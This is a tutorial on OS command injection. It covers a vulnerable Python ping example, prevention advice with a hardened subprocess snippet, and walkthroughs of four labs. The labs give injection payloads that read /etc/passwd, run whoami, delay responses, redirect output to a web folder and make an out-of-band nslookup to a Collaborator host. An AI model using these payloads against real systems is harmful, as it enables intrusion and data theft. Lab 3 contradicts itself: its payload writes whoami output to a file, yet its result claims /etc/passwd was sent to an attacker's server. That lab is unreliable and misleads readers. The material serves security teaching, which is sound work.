OS Command Injection is a vulnerability that allows attackers to execute arbitrary operating system commands on the server hosting an application. This occurs when an application passes user input directly to a system shell without proper validation or sanitization.
Example Exploit

Vulnerable Code

```python
import os

domain = input("Domain to ping: ")  # user-supplied input, passed to the shell unchecked
os.system(f"ping -c 4 {domain}")    # the shell interprets ';', '|' and '&&' inside domain
```

Attack Payload

google.com; cat /etc/passwd

The application executes:

```bash
ping -c 4 google.com; cat /etc/passwd
```
The /etc/passwd file is displayed, exposing sensitive system information.

Vulnerability Details

Common Locations
- Input fields that interact with system commands (e.g., ping, traceroute).
- File upload/download functionality.
- Administrative interfaces (e.g., server management tools).

Root Causes
- Unsanitized Input: failure to validate or sanitize user-supplied input.
- Use of Dangerous Functions: functions like os.system(), exec(), or popen() that execute shell commands.
- Lack of Input Validation: allowing special characters (e.g., ;, &, !).

Impact
- Remote Code Execution: full control over the server.
- Data Theft: access to sensitive files (e.g., /etc/passwd, database credentials).
- System Compromise: installation of malware or backdoors.

Prevention Strategies
1. Avoid Dangerous Functions:
   a. Use safer alternatives (e.g., subprocess.run() in Python with shell=False).
2. Input Validation:
   a. Whitelist allowed characters (e.g., alphanumerics).
   b. Reject input containing special characters (e.g., ;, &, !).
3. Sandboxing:
   a. Run the application in a restricted environment (e.g., a Docker container).
4. Least Privilege:
   a. Run the application with minimal permissions.
5. Web Application Firewall (WAF):
   a. Block malicious payloads.
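Prevention points 1 and 2 applied to the ping example, as an added illustration that is not code from the original article: the os.system() call is replaced by subprocess.run() with an argv list and shell=False, behind an allowlist for the host name. The allowlist pattern, the function names and the argv_passthrough helper are assumptions made for this example.

```python
import re
import subprocess
import sys

# Allowlist for the one value this endpoint accepts: a DNS host name built from
# letters, digits, hyphens and dots. Spaces, ';', '|', '&', '$', backticks and
# quotes never match, so they are rejected before any command is built. The
# pattern is an assumption for this example; adjust it to what your app accepts.
HOSTNAME_RE = re.compile(
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"          # first label
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"   # further labels
)

def is_valid_host(domain: str) -> bool:
    """True if `domain` is within DNS length limits and matches the allowlist."""
    return len(domain) <= 253 and HOSTNAME_RE.fullmatch(domain) is not None

def build_ping_argv(domain: str) -> list:
    """Build ping's argument vector. With an argv list and shell=False no shell
    ever sees the value, so ';', '|' or '&&' cannot start a second command;
    '--' ends option parsing, so the value cannot be read as a ping flag either
    (the allowlist already forbids a leading '-')."""
    if not is_valid_host(domain):
        raise ValueError(f"rejected host value: {domain!r}")
    return ["ping", "-c", "4", "--", domain]

def ping_host(domain: str, timeout: float = 30.0) -> subprocess.CompletedProcess:
    """Hardened replacement for os.system(f"ping -c 4 {domain}")."""
    return subprocess.run(build_ping_argv(domain), shell=False,
                          capture_output=True, text=True, timeout=timeout)

def argv_passthrough(value: str) -> str:
    """Show what a child process receives when `value` is passed through an argv
    list: a Python one-liner prints its own sys.argv[1]. Validation is skipped
    on purpose so a metacharacter-laden payload can be observed arriving as
    one literal argument instead of as extra commands."""
    proc = subprocess.run([sys.executable, "-c", "import sys; print(sys.argv[1])", value],
                          shell=False, capture_output=True, text=True)
    return proc.stdout.rstrip("\n")

if __name__ == "__main__":
    payload = "google.com; cat /etc/passwd"  # the payload from the example above
    print("child saw argv[1] =", repr(argv_passthrough(payload)))
    try:
        ping_host(payload)
    except ValueError as err:
        print("blocked:", err)
```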
Lab 1: OS command injection, simple case
1. Intercept the request with Burp Suite.
2. Modify the storeID parameter, giving it the value 1 | whoami.
Result: The server executes whoami, revealing the current user.

Lab 2: Blind OS command injection with time delays
1. Modify the email parameter, changing it to: email=x|ping+-c+10+127.0.0.1|
Result: The server response is delayed by 10 seconds, confirming the vulnerability.

Lab 3: Blind OS command injection with output redirection
Objective: Exfiltrate the /etc/passwd file.
Steps:
1. Change the email parameter to: email=||whoami>/var/www/images/output.txt|
Result: The /etc/passwd file is sent to the attacker's server.

Lab 4: Blind OS command injection with out-of-band interaction
1. Use Burp Suite to intercept and modify the request that submits feedback.
2. Modify the email parameter, changing it to: email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
3. Right-click and select "Insert Collaborator payload" to insert a Burp Collaborator subdomain where indicated in the modified email parameter.